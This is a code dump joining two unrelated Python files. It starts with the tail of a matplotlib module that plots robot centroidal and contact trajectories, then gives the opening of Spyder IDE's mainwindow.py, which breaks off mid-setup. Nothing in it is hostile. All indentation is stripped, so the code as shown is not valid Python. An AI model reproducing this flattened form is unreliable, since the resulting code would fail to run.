values = np.vstack([c_t, dc_t, ddc_t])
values_ref = np.vstack([c_ref, dc_ref, ddc_ref])
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.plot(timeline.T, values_ref[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotCOMTraj(cs, dt, name_suffixe = ""):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title("COM trajectory"+name_suffixe)
fig.suptitle("COM trajectory"+name_suffixe, fontsize=20)
c_t, timeline = discretizeCurve(cs.concatenateCtrajectories(), dt)
dc_t = discretizeCurve(cs.concatenateDCtrajectories(), dt)[0]
ddc_t = discretizeCurve(cs.concatenateDDCtrajectories(), dt)[0]
values = np.vstack([c_t, dc_t, ddc_t])
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotCOMTrajChanges(cs0, cs1, dt):
labels = [
"x (m)", "y (m)", "z (m)", "dx (m/s)", "dy (m/s)", "dz (m/s)", "ddx (m/s^2)", "ddy (m/s^2)", "ddz (m/s^2)"
]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(3, 3)
fig.canvas.set_window_title("Comparison of CoM trajectories")
fig.suptitle("Comparison of CoM trajectories. dashed: before dynamic filter, line: after", fontsize=20)
c0_t, timeline = discretizeCurve(cs0.concatenateCtrajectories(), dt)
dc0_t = discretizeCurve(cs0.concatenateDCtrajectories(), dt)[0]
ddc0_t = discretizeCurve(cs0.concatenateDDCtrajectories(), dt)[0]
values0 = np.vstack([c0_t, dc0_t, ddc0_t])
c1_t = discretizeCurve(cs1.concatenateCtrajectories(), dt)[0]
dc1_t = discretizeCurve(cs1.concatenateDCtrajectories(), dt)[0]
ddc1_t = discretizeCurve(cs1.concatenateDDCtrajectories(), dt)[0]
values1 = np.vstack([c1_t, dc1_t, ddc1_t])
for i in range(3): # line = pos,vel,acc
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values0[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.plot(timeline.T, values1[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs0, ax_sub)
def plotAMTrajWithReferences(cs_ref, cs, dt):
labels = ["x", "y", "z", "dx", "dy", "dz"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(2, 3)
fig.canvas.set_window_title("AM trajectory (dashed = reference)")
fig.suptitle("AM trajectory (dashed = reference)", fontsize=20)
L_t, timeline = discretizeCurve(cs.concatenateLtrajectories(), dt)
dL_t = discretizeCurve(cs.concatenateDLtrajectories(), dt)[0]
L_ref = discretizeCurve(cs_ref.concatenateLtrajectories(), dt)[0]
dL_ref = discretizeCurve(cs_ref.concatenateDLtrajectories(), dt)[0]
values = np.vstack([L_t, dL_t])
values_ref = np.vstack([L_ref, dL_ref])
for i in range(2): # line = L,dL
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.plot(timeline.T, values_ref[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotAMTraj(cs, dt, name_suffixe = ""):
labels = ["x", "y", "z", "dx", "dy", "dz"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(2, 3)
fig.canvas.set_window_title("AM trajectory"+name_suffixe)
fig.suptitle("AM trajectory"+name_suffixe, fontsize=20)
L_t, timeline = discretizeCurve(cs.concatenateLtrajectories(), dt)
dL_t = discretizeCurve(cs.concatenateDLtrajectories(), dt)[0]
values = np.vstack([L_t, dL_t])
for i in range(2): # line = L,dL
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs, ax_sub)
def plotAMTrajChanges(cs0, cs1, dt):
labels = ["x", "y", "z", "dx", "dy", "dz"]
colors = ['r', 'g', 'b']
fig, ax = plt.subplots(2, 3)
fig.canvas.set_window_title("Comparison of AM trajectories")
fig.suptitle("Comparison of AM trajectories. dashed: before dynamic filter, line: after", fontsize=20)
L0_t, timeline = discretizeCurve(cs0.concatenateLtrajectories(), dt)
dL0_t = discretizeCurve(cs0.concatenateDLtrajectories(), dt)[0]
values0 = np.vstack([L0_t, dL0_t])
L1_t = discretizeCurve(cs1.concatenateLtrajectories(), dt)[0]
dL1_t = discretizeCurve(cs1.concatenateDLtrajectories(), dt)[0]
values1 = np.vstack([L1_t, dL1_t])
for i in range(2): # line = L,dL
for j in range(3): # col = x,y,z
ax_sub = ax[i, j]
ax_sub.plot(timeline.T, values0[i * 3 + j, :].T, color=colors[j], linestyle="dashed")
ax_sub.plot(timeline.T, values1[i * 3 + j, :].T, color=colors[j])
ax_sub.set_xlabel('time (s)')
ax_sub.set_ylabel(labels[i * 3 + j])
ax_sub.yaxis.grid()
addVerticalLineContactSwitch(cs0, ax_sub)
def plotContactForces(cs, dt):
colors = ['r', 'g', 'b', 'y']
fig = plt.figure("Contact normal force")
plt.suptitle("Contact normal force")
ax = fig.gca()
ax.set_xlabel('time (s)')
ax.set_ylabel("Contact normal force (N)")
ax.yaxis.grid()
sum_f = None
for i, eeName in enumerate(cs.getAllEffectorsInContact()):
force, timeline = discretizeCurve(cs.concatenateNormalForceTrajectories(eeName), dt)
ax.plot(timeline.T, force.T, color=colors[i], label=eeName)
if sum_f is None:
sum_f = force
else:
sum_f += force
ax.plot(timeline.T, sum_f.T, color="k", label="sum")
addVerticalLineContactSwitch(cs, ax)
ax.legend()
def plotKneeTorque(cs, dt, kneeIds, offset):
colors = ['r', 'g', 'b', 'y']
fig = plt.figure("Knee torque")
plt.suptitle("Knee torque")
ax = fig.gca()
ax.set_xlabel('time (s)')
ax.set_ylabel("Torque")
ax.yaxis.grid()
tau, timeline = discretizeCurve(cs.concatenateTauTrajectories(), dt)
for k, name in enumerate(kneeIds.keys()):
ax.plot(timeline.T, tau[kneeIds[name] - offset, :].T, color=colors[k], label=name)
# - 1 because it's the index in the configuration space, and here we are in the velocity space
addVerticalLineContactSwitch(cs, ax)
ax.legend()
def plotTimingChanges(cs, cs_iters, cfg):
sequences = [cs] + cs_iters
values = []
for cs in sequences:
timings = []
for phase in cs.contactPhases:
timings += [phase.duration]
values += [np.array(timings)]
colors = ['k', 'b', 'g','r', 'c', 'm', 'y']
fig = plt.figure("Evolution of phase duration with dynamic filter")
plt.suptitle("Evolution of phase duration dynamic filter")
bar_width = 0.2
ax = fig.gca()
ax.set_xlabel('phase id')
ax.set_ylabel("duration(s)")
ax.yaxis.grid()
x_axis = np.arange(cs.size())
for i, val in enumerate(values):
plt.bar(x_axis + bar_width * i, val, bar_width, color=colors[i], edgecolor='k')
labels = ["init guess"] + ["iter "+str(i) for i in range(len(values)-1)]
ax.legend(labels)
ax.legend()
def saveAllFigures(path_dir):
if not os.path.exists(path_dir):
os.makedirs(path_dir)
for i in plt.get_fignums():
fig = plt.figure(i)
fig.savefig(path_dir + "/" + str(fig._suptitle.get_text()) + ".eps", dpi=600)
def plotALLFromWB(cs_ref_iters, cs_iters ,cfg):
cs = cs_iters[-1]
cs_ref = cs_ref_iters[-1]
print("Plotting ...")
plt.rcParams['axes.linewidth'] = plt.rcParams['font.size'] / 30.
plt.rcParams['lines.linewidth'] = plt.rcParams['font.size'] / 30.
display = cfg.DISPLAY_PLOT
save = cfg.SAVE_PLOT
path = cfg.OUTPUT_DIR + "/plot/" + cfg.DEMO_NAME
dt = cfg.IK_dt
if cs_ref.haveCOMtrajectories():
if cs.haveCOMtrajectories():
plotCOMTrajWithReferences(cs_ref, cs, dt)
plotCOMdifference(cs_ref, cs, dt,"CoM tracking error")
elif not cfg.PLOT_CENTROIDAL:
plotCOMTraj(cs_ref, dt)
# else : it's already plotted
if cs_ref.haveAMtrajectories():
if cs.haveAMtrajectories():
plotAMTrajWithReferences(cs_ref, cs, dt)
plotAMdifference(cs_ref, cs, dt, "AM tracking error")
elif not cfg.PLOT_CENTROIDAL:
plotAMTraj(cs_ref, dt)
# else : it's already plotted
if cs.haveZMPtrajectories():
for cs_ref in cs_ref_iters:
Requirements.requireZMPtrajectories(cs_ref, cfg)
plotZMP(cs_ref_iters, cs_iters, dt, cfg.PLOT_CIRCLE_RADIUS)
plotZMPdifferences(cs_ref_iters, cs_iters, dt)
if cs.haveTorquesTrajectories():
offset = cs.contactPhases[0].q_t.dim() - cs.contactPhases[0].tau_t.dim()
plotKneeTorque(cs, dt, cfg.Robot.kneeIds, offset)
if cs.haveContactForcesTrajectories():
plotContactForces(cs, dt)
if cs.haveEffectorsTrajectories(1e-1):
plotEffectorTrajectoryWithReference(cs_ref, cs, dt)
plotEffectorError(cs_ref, cs, dt)
else:
plotEffectorTrajectory(cs, dt, "Reference")
if display:
plt.show(block=False)
if save and path:
saveAllFigures(path)
print("Plotting Done.")
def compareCentroidal(cs, cs_iters, cfg):
plt.rcParams['axes.linewidth'] = plt.rcParams['font.size'] / 30.
plt.rcParams['lines.linewidth'] = plt.rcParams['font.size'] / 30.
display = cfg.DISPLAY_PLOT
save = cfg.SAVE_PLOT
path = cfg.OUTPUT_DIR + "/plot/" + cfg.DEMO_NAME
dt = cfg.SOLVER_DT
if cs_iters[0].contactPhases[-1].timeFinal != cs_iters[-1].contactPhases[-1].timeFinal:
print("Cannot plot differences, the two curves do not have the same duration.")
plotTimingChanges(cs, cs_iters, cfg)
else:
plotAMdifference(cs_iters[0], cs_iters[-1], dt, "Dynamic filter changes on AM trajectory")
plotCOMdifference(cs_iters[0], cs_iters[-1], dt, "Dynamic filter changes on CoM trajectory")
plotCOMTrajChanges(cs_iters[0], cs_iters[-1], dt)
plotAMTrajChanges(cs_iters[0], cs_iters[-1], dt)
if display:
plt.show(block=False)
if save and path:
saveAllFigures(path)
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific PYthon Development EnviRonment
=====================================================
Developped and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import atexit
import errno
import os
import os.path as osp
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import traceback
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Workaround: importing rope.base.project here, otherwise this module can't
# be imported if Spyder was executed from another folder than spyder
#==============================================================================
try:
import rope.base.project # analysis:ignore
except ImportError:
pass
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot)
from qtpy.QtGui import QColor, QDesktopServices, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
# when PySide is selected by the QT_API environment variable and when PyQt4
# is also installed (or any other Qt-based application prepending a directory
# containing incompatible Qt DLLs versions in PATH):
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attibute must
# be set before creating the application.
#==============================================================================
from spyder.config.main import CONF
if CONF.get('main', 'high_dpi_scaling'):
high_dpi_scaling = True
else:
high_dpi_scaling = False
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, high_dpi_scaling)
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR
MAIN_APP = qapplication()
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV, PYTEST
if not PYTEST:
SPLASH = QSplashScreen(QPixmap(get_image_path('Tellurium_splash.png'), 'png'))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.black))
QApplication.processEvents()
else:
SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import __version__, __project_url__, __forum_url__, get_versions
from spyder.config.base import (get_conf_path, get_module_data_path,
get_module_source_path, STDERR, DEBUG,
debug_print, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.config.ipython import QTCONSOLE_INSTALLED
from spyder.py3compat import (getcwd, is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.introspection import module_completion
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd()
#==============================================================================
# Spyder's main window widgets utilities
#==============================================================================
def get_python_doc_path():
"""
Return Python documentation path
(Windows: return the PythonXX.chm path if available)
"""
if os.name == 'nt':
doc_path = osp.join(sys.prefix, "Doc")
if not osp.isdir(doc_path):
return
python_chm = [path for path in os.listdir(doc_path)
if re.match(r"(?i)Python[0-9]{3,6}.chm", path)]
if python_chm:
return file_uri(osp.join(doc_path, python_chm[0]))
else:
vinf = sys.version_info
doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1])
python_doc = osp.join(doc_path, "index.html")
if osp.isfile(python_doc):
return file_uri(python_doc)
def get_focus_python_shell():
"""Extract and return Python shell from widget
Return None if *widget* is not a Python shell (e.g. IPython kernel)"""
widget = QApplication.focusWidget()
from spyder.widgets.shell import PythonShellWidget
from spyder.widgets.externalshell.pythonshell import ExternalPythonShell
if isinstance(widget, PythonShellWidget):
return widget
elif isinstance(widget, ExternalPythonShell):
return widget.shell
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
SPYDER_PATH = get_conf_path('path')
BOOKMARKS = (
('numpy', "http://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "http://matplotlib.sourceforge.net/contents.html",
_("Matplotlib documentation")),
('PyQt4',
"http://pyqt.sourceforge.net/Docs/PyQt4/",
_("PyQt4 Reference Guide")),
('PyQt4',
"http://pyqt.sourceforge.net/Docs/PyQt4/classes.html",
_("PyQt4 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # related to interactive tour
sig_moved = Signal("QMoveEvent") # related to interactive tour
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
self.open_project = options.open_project
self.debug_print("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Create our TEMPDIR
if not osp.isdir(programs.TEMPDIR):
os.mkdir(programs.TEMPDIR)
# Shortcut management data
self.shortcut_data = []
# Loading Spyder path
self.path = []
self.project_path = []
if osp.isfile(self.SPYDER_PATH):
self.path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = [name for name in self.path if osp.isdir(name)]
self.remove_path_from_sys_path()
self.add_path_to_sys_path()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.extconsole = None
self.ipyconsole = None
self.variableexplorer = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# Check for updates Thread and Worker, refereces needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.plugins.configdialog import (MainConfigPage,
ColorSchemeConfigPage)
from spyder.plugins.shortcuts import ShortcutsConfigPage
from spyder.plugins.runconfig import RunConfigPage
from spyder.plugins.maininterpreter import MainInterpreterConfigPage
self.general_prefs = [MainConfigPage, ShortcutsConfigPage,
ColorSchemeConfigPage, MainInterpreterConfigPage,
RunConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
# Quick Layouts and Dialogs
from spyder.plugins.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_dockwidgets_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.mem_status = None
self.cpu_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
# Set Window title and icon
if DEV is not None:
title = "Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = "Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if DEBUG:
title += " [DEBUG MODE %d]" % DEBUG
if options.window_title is not None:
title += ' -- ' + options.window_title
self.base_title = title
self.update_window_title()
resample = os.name != 'nt'
icon = ima.icon('spyder', resample=resample)
# Resampling SVG icon only on non-Windows platforms (see Issue 1314):
self.setWindowIcon(icon)
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
debug_print("appusermodelid: " + str(res))
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.dockwidgets_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# Track which console plugin type had last focus
# True: Console plugin
# False: IPython console plugin
self.last_console_plugin_focus_was_python = True
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
self.apply_settings()
self.debug_print("End of MainWindow constructor")
def debug_print(self, message):
"""Debug prints"""
debug_print(message)
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def setup(self):
"""Setup main window"""
self.debug_print("*** Start of MainWindow setup ***")
self.debug_print(" ..core actions")
self.close_dockwidget_action = create_action(self,
icon=ima.icon('DialogCloseButton'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_dockwidgets_action = create_action(self, _("Lock panes"),
toggled=self.toggle_lock_dockwidgets,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_dockwidgets_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
namespace = None
self.debug_print(" ..toolbars")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
self.debug_print(" ..tools")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.edit_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_sc_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.path_manager_callback,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
update_modules_action = create_action(self,
_("Update module names list"),
triggered=lambda:
module_completion.reset(),
tip=_("Refresh list of module names "
"available in PYTHONPATH"))
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
self.tools_menu_actions += [reset_spyder_action, MENU_SEPARATOR,
update_modules_action]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"),
name, 'qtdesigner.png')
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"),
"linguist", 'qtlinguist.png')
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
qteact = create_python_script_action(self,
_("Qt examples"), 'qt.png', "PyQt4",
osp.join("examples", "demos",
"qtdemo", "qtdemo"), args)
for act in (qtdact, qtlact, qteact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
self.debug_print(" ..sift?")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see issue 2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except (ImportError, AssertionError):
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
